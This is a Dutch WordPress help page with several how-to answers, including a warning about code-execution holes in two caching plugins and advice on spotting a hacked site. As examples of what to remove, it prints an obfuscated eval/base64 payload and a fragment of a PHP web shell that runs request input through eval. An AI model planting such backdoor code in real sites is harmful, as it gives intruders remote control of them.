WP-admin menu bug in Chrome

Ook last van het probleem in Chrome 45 dat het admin menu begint te flippen? Je kan het oplossen door het menu in- en uit te vouwen.

Als je het probleem permanent wil oplossen kan je mijn eerste officële plug-in installeren. Hij voegt alleen maar deze regel toe maar het lost wel het probleem op:

if ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Chrome/45' ) !== false ) add_action('admin_head', create_function('', "echo \"<script type='text/javascript'>jQuery(window).load(function(){jQuery('#adminmenuwrap').hide().show(0);});</script>\";") );

De plug-in vind je hier.

Wil je weten hoe je een plug-in moet installeren? Kijk dan in de handleiding: Hoofdstuk 4: Plug-ins installeren

Belangrijk: Update W3 Total cache of WP Super Cache

Via dit artikel werden we gewezen op de kwetsbaarheden die zijn gevonden in de twee grootste cache plugins:

  • W3 Total cache
  • WP Super Cache

In beide plugins was het mogelijk om PHP code uit te voeren via de standaard reageer functionaliteit. Iets waarmee kwaadwillenden eenvoudig backdoor scripts (of zogenoemde shells) kunnen plaatsen waarna ze vrije toegang hebben tot alle bestanden in je webhostingaccount.

Waarom zouden ze mij willen hacken?

In de meeste gevallen is een dergelijke hack niets persoonlijks. Vaak kijken ze niet eens naar de bestanden omdat het proberen en inbreken volledig geautomatiseerd is.

Maar wat doen ze eigenlijk zodra ze toegang hebben? Een paar opties:

Spam versturen

Spam versturen is nog steeds lucratief. Als ze jouw webhosting accountje met goede reputatie kunnen gebruiken om tien of honderdduizenden berichten te sturen, dan doen ze dat maar al te graag.

Virus verspreiden

Door een JavaScript-code in te brengen in jouw html/php pagina’s worden al jouw bezoekers “onder water” doorgestuurd naar een malafide code die ergens anders staat. Door deze weer up te daten kunnen ze gerichte malware of virussen proberen te injecteren.

Onderdeel van een Botnet maken

Je hoort de laatste tijd veel nieuws over DDoS-aanvallen. Dit zijn aanvallen die komen vanaf botnets. Het kan zijn dat jouw hostingaccount ook onderdeel uitmaakt van zo’n Botnet en deel uit maakt van zo’n DDoS aanval.

Backdoors inbouwen

Ze bouwen vaak ook een extra backdoor in, dus een extra achterdeur. Als jij denkt dat je alles hebt opgeruimd hebben ze vaak nog een deur op een kier gezet om dezelfde trucjes gewoon weer uit te halen. Dus dan begint het weer met het plaatsen van een shell, en daarna kiezen ze weer één of meerdere van bovenstaande opties. Wat ik vaak zie is dat de standaard COPYWRIGHT.PHP van WordPress wordt aangepast naar een backdoor script.

Ik gebruik één van de twee cache plugins. En nu?

Updaten! Zo snel mogelijk een update doen en anders die plugins helemaal uitzetten. Het is een kwestie van tijd voordat je WordPress installatie ook gehackt wordt.

Hoe kom ik er achter of mijn WordPress installatie geïnfecteerd is?

Als je inzicht hebt in je reacties, en je hebt niets vreemds gezien, dan is er waarschijnlijk ook niets aan de hand.

Als je in de mappen van je WordPress installatie kijkt kan je vaak aan de data al zien of er gerommeld is. Als alle data nog afstammen van het moment dat je WordPress hebt geïnstalleerd of hebt geupdate, dan is er niets aan de hand. Maar als je ziet dat belangrijke bestanden op de datum van vandaag of gisteren staan, zonder dat je zelf iets hebt gedaan, dan is er iets mis.

Open de .php bestanden met zo’n afwijkende datum en zoek naar lange onleesbare codes, zoals:

eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1ClVJ3Z+F/zdnM9Znv1X55tFYH9f1kVS1n993+iiorDYWviEIA4GgnspGTd37DP+uVE1IvRZQH/8lxft4uqCHokTtUAUBBGsDucAXI8n7f0Gp2sYXkKYBkAcGBdZhWZlDcBIvb5oXFZ/s7p5ksrXsZ29EcHiFDq/lMgav4VLeqqTF6tPtzIWBvTXvgTNKjXFgqmoXa80E4ZCk9xbvNPzhDledODU1PHct9J6vOtiK6fgdTbBmK3E47Aa/URB24tldhtEe46TjqpMb4DBGXMo29rpii3qhDTZIpMcB1xBok332BjccfPXq0QsZU/g4eapBxT5git1rGdKtwf1rt9OOicc/hTlpeFmEjRRkWGWTJTkCol0X4AuwJSfFhtfP5dOgn561il+wkzkqCG9dfT9zqc274veIeSd41CxUIvH')));

 $dcawl = "d410cf2db81b72a00493e14ec542b3f"; if(isset($_REQUEST['eujjfr'])) { $eoetbln = $_REQUEST['eujjfr']; eval($eoetbln); exit(); } if(isset($_REQUEST['jqsjw'])) { $zcxdhege = $_REQUEST['sjjcsp']; $ltipnkb = $_REQUEST[

Haal deze codes er uit. Maar nog beter: herinstalleer de bestanden van WordPress via de knop “Opnieuw installeren”.

Er zijn ook mooie plugins ter beveiliging en controle van je WordPress installatie. Bijvoorbeeld BulletProof.

Hoe kan ik een contactformulier maken?

Een contactformulier maken is zo klaar als je gebruik maakt van een plugin. Er zijn een heleboel plugins die dit verzorgen maar ik raad Contact Form 7 aan, van Takayuki Miyoshi.

  • Ga naar Plugins > Nieuwe Plugin
  • Zoek op “contact form 7
  • Klik op “Nu Installeren”, Ok, en daarna op “Plugin activeren”
  • Ga links in het menu naar “Contact”
  • Kopieer de code onder “Shortcode” en kopieer deze naar je klembord
  • Maak een nieuwe pagina aan of plak de code in een bestaande pagina

Als het goed is staat er nu een volledig werkend contactformulier op de aangemaakte pagina.

De velden van het contactformulier kunnen aangepast worden via “bewerken”. Let er op dat je wel de velden die je gebruikt ook verwekt in de e-mail template er onder. Door de knop “Tag aanmaken” te gebruiken wordt dit uitgelegd.

Hoe kan ik WordPress gratis testen?

Als je gratis en vrijblijvend WordPress wilt testen, om wat voor reden dan ook, dan kan je vanaf nu terecht bij WordPress Express

WordPress Express is een samenwerking tussen Keizer IT en KeurigOnline die gebruikers een mogelijkheid biedt om een instant testomgeving te creëren om te oefenen met WordPress.

Het is ook een ideale oplossing voor thema ontwikkelaars, plug-in schrijvers en mensen die op zoek zijn naar een nieuwe webhostingprovider om zaken mee te doen.

Hoe kan ik al mijn tags in de sidebar tonen?

Het is heel eenvoudig om een zogenoemde “Tag cloud” toe te voegen aan de sidebar:

  • Klik in je dashboard op Weergave > Widgets
  • Zoek links de widget “Tagwolk” op en sleep hem rechts in het vak onder “Main Sidebar”
  • Geef de widget en titel en klik op opslaan

Tip: Je kan de taxonomies ook op “Categorieën” zetten. Zo krijg je een “Tagwolk” van je meest gebruikte categorieën!

Hoe kan ik WordPress beter beveiligen?

Om je WordPress beter te beveiligen kan je één of meerdere plug-ins installeren.

Bekijk bijvoorbeeld eens naar de plug-in WordFence. Deze plugin beveiligt preventief en houdt iedereen die probeert in te breken buiten de deur. Ook kan hij je gehele WordPress installatie periodiek scannen om zo bijvoorbeeld backdoor shells op te sporen.

Hoe je je WordPress optimaal beveiligt lees je in de Nederlandse WordPress handleiding Hoofdstuk 6: beveiligen.

Hoe stuur ik mijn weblog.nl blog door naar mijn nieuwe WordPress.com blog?

Het is niet een elegante oplossing, maar het is wel degelijk mogelijk om er zelf voor te zorgen dat je bezoekers automatisch worden doorgestuurd.

Ga als volgt te werk:

  • Ga naar je dashboard op je weblog.nl blog
  • Ga naar Weergave > Widgets
  • Sleep een nieuwe widget “Tekst” naar rechts naar “Het belangrijkste zijmenu”
  • Zet in het grote vak de volgende code:

<script>location.href='http://hierjenieuweadresvanje.wordpress.com';</script>

  • Sla de widget op en wacht een kwartiertje.
  • Vanaf nu zullen de bezoekers worden doorgestuurd

Hoe importeer ik een bestand groter dan 15MB bij mijn WordPress.com blog?

WordPress.com hanteert inderdaad een limiet van 15 MB voor het importeren van een XML bestand.

Gelukkig helpen ze je graag een handje, ga daarom als volgt te werk:

  • Ga naar WeTransfer.com en klik op “Voeg bestanden toe”.
  • Zoek het bestand op en klik op openen
  • Klik op het knopje linksonder en klik op “Link”
  • Kopiëer de link en stuur deze samen met je nieuwe blog URL op wordpress.com naar support@wordpress.com

Zij zullen je blog zo snel mogelijk importeren!